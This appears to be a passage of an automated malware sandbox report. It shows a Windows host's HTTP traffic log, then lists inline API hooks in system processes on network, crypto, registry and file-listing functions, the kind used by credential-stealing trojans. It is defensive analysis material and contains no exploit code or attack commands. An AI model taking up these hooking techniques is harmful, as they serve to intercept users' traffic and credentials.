Jul 2, 2012 20:06:45.452275038 CEST	1043	80	192.168.0.10	173.194.69.106	GET / HTTP/1.1 Accept: / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive	3
Jul 2, 2012 20:06:45.937494040 CEST	80	1043	173.194.69.106	192.168.0.10	HTTP/1.1 302 Found Location: http://www.google.fr/ Cache-Control: private Content-Type: text/html; charset=UTF-8 Set-Cookie: expires=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=www.google.com Set-Cookie: path=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=www.google.com Set-Cookie: domain=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=www.google.com Set-Cookie: expires=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.www.google.com Set-Cookie: pat	3
Jul 2, 2012 20:06:49.147241116 CEST	1044	80	192.168.0.10	173.194.69.94	GET / HTTP/1.1 Accept: / Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive	6
Jul 2, 2012 20:06:49.581904888 CEST	80	1044	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Set-Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; expires=Tue, 01-Jan-2013 18:06:49 GMT; path=/; domain=.google.fr; HttpOnly Date: Mon, 02 Jul 2012 18:06:49 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ; expires=Wed, 02-Jul-2014 18:06:49 GMT; p	7
Jul 2, 2012 20:06:51.612915993 CEST	1044	80	192.168.0.10	173.194.69.94	GET /images/icons/product/chrome-48.png HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	37
Jul 2, 2012 20:06:51.665994883 CEST	1045	80	192.168.0.10	173.194.69.94	GET /images/mgyhp_sm.png HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	38
Jul 2, 2012 20:06:51.936590910 CEST	80	1044	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT Date: Mon, 02 Jul 2012 18:06:51 GMT Expires: Mon, 02 Jul 2012 18:06:51 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 1834 X-XSS-Protection: 1; mode=block	38
Jul 2, 2012 20:06:52.330037117 CEST	80	1045	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT Date: Mon, 02 Jul 2012 18:06:52 GMT Expires: Mon, 02 Jul 2012 18:06:52 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 331 X-XSS-Protection: 1; mode=block	41
Jul 2, 2012 20:06:52.392671108 CEST	1044	80	192.168.0.10	173.194.69.94	GET /images/srpr/logo3w.png HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	41
Jul 2, 2012 20:06:52.681835890 CEST	80	1044	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT Date: Mon, 02 Jul 2012 18:06:52 GMT Expires: Mon, 02 Jul 2012 18:06:52 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 7007 X-XSS-Protection: 1; mode=block	42
Jul 2, 2012 20:06:58.000196934 CEST	1046	80	192.168.0.10	199.7.71.190	GET /pca3.crl HTTP/1.1 Accept: / User-Agent: Microsoft-CryptoAPI/5.131.2600.5512 Host: crl.verisign.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache	50
Jul 2, 2012 20:06:58.523797989 CEST	80	1046	199.7.71.190	192.168.0.10	HTTP/1.0 200 OK Age: 418 Date: Mon, 02 Jul 2012 18:00:01 GMT Connection: Keep-Alive Via: NS-248 ETag: "c3d047-382-4c370d230a740" Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 27 Jun 2012 09:27:17 GMT Accept-Ranges: bytes Content-Length: 898 Content-Type: application/pkix-crl X-Cache: MISS from hostname X-Cache-Lookup: HIT from hostname:80 Via: 1.0 hostname:80 (squid/2.6.STABLE21)	51
Jul 2, 2012 20:07:00.461488962 CEST	1047	80	192.168.0.10	199.7.52.190	GET /CSC3-2009-2.crl HTTP/1.1 Accept: / User-Agent: Microsoft-CryptoAPI/5.131.2600.5512 Host: csc3-2009-2-crl.verisign.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache	53
Jul 2, 2012 20:07:01.242489100 CEST	80	1047	199.7.52.190	192.168.0.10	HTTP/1.0 200 OK Age: 4825 Date: Mon, 02 Jul 2012 16:46:12 GMT Connection: Keep-Alive Via: NS-248 ETag: "cbcdd2-8dac-4c3d50600aac0" Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 02 Jul 2012 09:00:03 GMT Accept-Ranges: bytes Content-Length: 36268 Content-Type: application/pkix-crl X-Cache: MISS from hostname X-Cache-Lookup: HIT from hostname:80 Via: 1.0 hostname:80 (squid/2.6.STABLE21)	53
Jul 2, 2012 20:07:04.971585989 CEST	1045	80	192.168.0.10	173.194.69.94	GET /images/nav_logo107.png HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	92
Jul 2, 2012 20:07:04.993516922 CEST	1044	80	192.168.0.10	173.194.69.94	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	93
Jul 2, 2012 20:07:05.822736025 CEST	80	1045	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Fri, 16 Mar 2012 04:38:08 GMT Date: Mon, 02 Jul 2012 18:07:05 GMT Expires: Mon, 02 Jul 2012 18:07:05 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 28693 X-XSS-Protection: 1; mode=block	94
Jul 2, 2012 20:07:06.741183043 CEST	80	1044	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/x-icon Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT Date: Mon, 02 Jul 2012 18:07:05 GMT Expires: Mon, 02 Jul 2012 18:07:05 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 1150 X-XSS-Protection: 1; mode=block	123
Jul 2, 2012 20:07:08.160505056 CEST	1048	80	192.168.0.10	173.194.69.94	GET /xjs/_/js/s/s,st,anim,bbd,c,sb,hv,wta,cr,cdos,pj,tbpr,tbui,rsn,ob,mb,lc,du,ada,bihu,lu,m,tng,hsm,j,p,pcc,csitl/rt=j/ver=2uka1iBbpRI.en_US./d=1/rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	127
Jul 2, 2012 20:07:08.269750118 CEST	1049	80	192.168.0.10	173.194.69.120	GET /gb/js/sem_feed2a2e2d54cd5f40fb4b5f5244fff2.js HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: ssl.gstatic.com Connection: Keep-Alive	127
Jul 2, 2012 20:07:08.792800903 CEST	80	1048	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Type: text/javascript; charset=UTF-8 Last-Modified: Wed, 27 Jun 2012 20:50:45 GMT Date: Thu, 28 Jun 2012 06:14:39 GMT Expires: Fri, 28 Jun 2013 06:14:39 GMT X-Content-Type-Options: nosniff Server: sffe Content-Length: 148757 X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=31536000 Age: 388349	128
Jul 2, 2012 20:07:09.130589008 CEST	80	1049	173.194.69.120	192.168.0.10	HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Type: text/javascript Last-Modified: Sat, 23 Jun 2012 00:48:13 GMT Date: Fri, 29 Jun 2012 00:11:11 GMT Expires: Sat, 29 Jun 2013 00:11:11 GMT X-Content-Type-Options: nosniff Server: sffe Content-Length: 16899 X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=31536000 Age: 323757	149
Jul 2, 2012 20:07:11.673084974 CEST	1045	80	192.168.0.10	173.194.69.94	GET /extern_chrome/b0659096785d29d3.js HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	302
Jul 2, 2012 20:07:11.705770969 CEST	1043	80	192.168.0.10	173.194.69.106	GET /textinputassistant/tia.png HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.com Connection: Keep-Alive Cookie: PREF=ID=b8f41e5b813d51f9:FF=0:TM=1341252405:LM=1341252405:S=NXmQUgviyBccuaAo; NID=61=u_t_Gs4zI_yaBLYWf0uU3zyZSzLMqlejZOsjbyCWoSUxN2JAn6gUYSqUNkF1vxLg_H3tp8MLoqogxEQVj0Mcu2AKFCLiOuGsX3yjeGRzqtx4ZVTI-Rs029jyAzvqgsFk	303
Jul 2, 2012 20:07:11.751661062 CEST	1049	80	192.168.0.10	173.194.69.120	GET /gb/images/j_e6a6aca6.png HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: ssl.gstatic.com Connection: Keep-Alive	303
Jul 2, 2012 20:07:11.793359041 CEST	1044	80	192.168.0.10	173.194.69.94	GET /images/swxa.gif HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	304
Jul 2, 2012 20:07:11.972590923 CEST	80	1049	173.194.69.120	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Thu, 29 Mar 2012 23:53:57 GMT Date: Thu, 28 Jun 2012 06:14:31 GMT Expires: Fri, 28 Jun 2013 06:14:31 GMT X-Content-Type-Options: nosniff Server: sffe Content-Length: 15130 X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=31536000 Age: 388360	305
Jul 2, 2012 20:07:11.993705988 CEST	1048	80	192.168.0.10	173.194.69.94	GET /csi?v=3&s=webhp&action=&e=25657,37102,38788,38816,39366,39370,39411,39580,39604,39664,39730&ei=OePxT97YG8bMsgaJi-nUCg&imc=2&imn=2&imp=2&rt=xjsls.968,prt.1000,ol.14281,iml.14125,xjses.20890,xjsee.21234,xjs.21265 HTTP/1.1 Accept: / Referer: http://www.google.fr/ Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705) Accept-Encoding: gzip, deflate Host: www.google.fr Connection: Keep-Alive Cookie: NID=61=LTNZ5hchIxTXf9g46Vh46pZ3PPZRB_aCxpkRbZwaww0ClsVKtUIak_uByc4-vO20rcdtlfVumPp0LiXmFKT7vuUX4btikuXISQTna61ENhSXmecPZbYwLDWLcCjtRYpE; PREF=ID=8fc9d366c9dd4f9e:FF=0:TM=1341252409:LM=1341252409:S=dXuwgWod9_aLQOcZ	306
Jul 2, 2012 20:07:12.158823967 CEST	80	1045	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Expires: Mon, 01 Jul 2013 00:00:00 GMT Last-Modified: Mon, 04 Jul 2011 00:00:00 GMT Content-Type: text/javascript; charset=UTF-8 Content-Disposition: attachment Content-Encoding: gzip Date: Mon, 02 Jul 2012 18:07:11 GMT Server: gws Cache-Control: private Content-Length: 10633 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN	321
Jul 2, 2012 20:07:12.365483046 CEST	80	1043	173.194.69.106	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT Date: Mon, 02 Jul 2012 18:07:11 GMT Expires: Mon, 02 Jul 2012 18:07:11 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 387 X-XSS-Protection: 1; mode=block	333
Jul 2, 2012 20:07:12.377383947 CEST	80	1044	173.194.69.94	192.168.0.10	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT Date: Mon, 02 Jul 2012 18:07:12 GMT Expires: Mon, 02 Jul 2012 18:07:12 GMT Cache-Control: private, max-age=31536000 X-Content-Type-Options: nosniff Server: sffe Content-Length: 5223 X-XSS-Protection: 1; mode=block	334
Jul 2, 2012 20:07:12.410785913 CEST	80	1048	173.194.69.94	192.168.0.10	HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 21 Jan 2004 19:51:30 GMT Pragma: no-cache Cache-Control: private, no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: image/gif Server: Golfe	338

Hooks

User Modules

Hook Summary
Function Name	Hook Type	Active in Processes
TranslateMessage	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
ZwVdmControl	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
NtResumeThread	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
ZwEnumerateValueKey	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
ZwResumeThread	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
NtVdmControl	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
LdrLoadDll	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
NtEnumerateValueKey	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
NtQueryDirectoryFile	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
ZwQueryDirectoryFile	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
send	INLINE	winlogon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, spoolsv.exe, explorer.exe
PFXImportCertStore	INLINE	winlogon.exe, jqs.exe, lsass.exe, svchost.exe, spoolsv.exe, msiexec.exe, explorer.exe
CryptEncrypt	INLINE	winlogon.exe, ctfmon.exe, svchost.exe, jqs.exe, lsass.exe, msdtc.exe, dllhost.exe, alg.exe, wscntfy.exe, spoolsv.exe, msiexec.exe, MDM.EXE, explorer.exe
InternetReadFile	INLINE	svchost.exe
HttpOpenRequestA	INLINE	svchost.exe
HttpSendRequestA	INLINE	svchost.exe, explorer.exe
HttpSendRequestW	INLINE	svchost.exe, explorer.exe
InternetQueryDataAvailable	INLINE	svchost.exe
InternetReadFileExA	INLINE	svchost.exe
HttpQueryInfoA	INLINE	svchost.exe
InternetWriteFile	INLINE	svchost.exe, explorer.exe
InternetQueryOptionA	INLINE	svchost.exe
HttpAddRequestHeadersA	INLINE	svchost.exe
InternetCloseHandle	INLINE	svchost.exe, explorer.exe

Processes

Process: winlogon.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: winlogon.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: winlogon.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: winlogon.exe, Module: CRYPT32.dll
Function Name	Hook Type	New Data
PFXImportCertStore	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: winlogon.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: ctfmon.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: ctfmon.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: ctfmon.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WININET.dll
Function Name	Hook Type	New Data
InternetReadFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpOpenRequestA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpSendRequestW	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryDataAvailable	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetReadFileExA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpQueryInfoA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetWriteFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetQueryOptionA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
HttpAddRequestHeadersA	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
InternetCloseHandle	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
CryptEncrypt	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ntdll.dll
Function Name	Hook Type	New Data
ZwVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwResumeThread	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtVdmControl	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
LdrLoadDll	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtEnumerateValueKey	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
NtQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E
ZwQueryDirectoryFile	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: WS2_32.dll
Function Name	Hook Type	New Data
send	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: USER32.dll
Function Name	Hook Type	New Data
TranslateMessage	INLINE	0xEB 0xB0 0x01 0x1C 0xC3 0x3E

Process: svchost.exe, Module: ADVAPI32.dll
Function Name	Hook Type	New Data
